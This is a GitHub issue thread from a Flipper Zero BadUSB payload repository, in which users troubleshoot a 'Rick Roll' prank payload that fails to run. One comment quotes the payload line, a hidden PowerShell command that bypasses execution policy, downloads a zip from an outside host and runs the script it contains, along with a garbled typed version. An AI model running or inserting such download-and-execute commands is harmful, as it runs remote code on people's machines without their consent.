I-Am-Jakoby / Flipper-Zero-BadUSB

Repository for my flipper zero badUSB payloads. Now almost entirely plug and play.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Won't start Rick Roll

math3011 opened this issue · comments

When i run the Rick Roll it runs and opens the powershell for a second and closes it again but when I try moving my mouse nothing happens. But if I manualy write it and hit enter it runs and opens powershell and when I move my mouse it starts.

What language is your keyboard?
if it is not in english it will not work properly

I have the same issue
added a delay 9000 command after the string to debug
instead of typing
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"

it's instead typing
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"r.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"

seems to be eating some keys
disabled antivirus on the off chance that it was somehow messing with it
US keyboard here as well
any thoughts?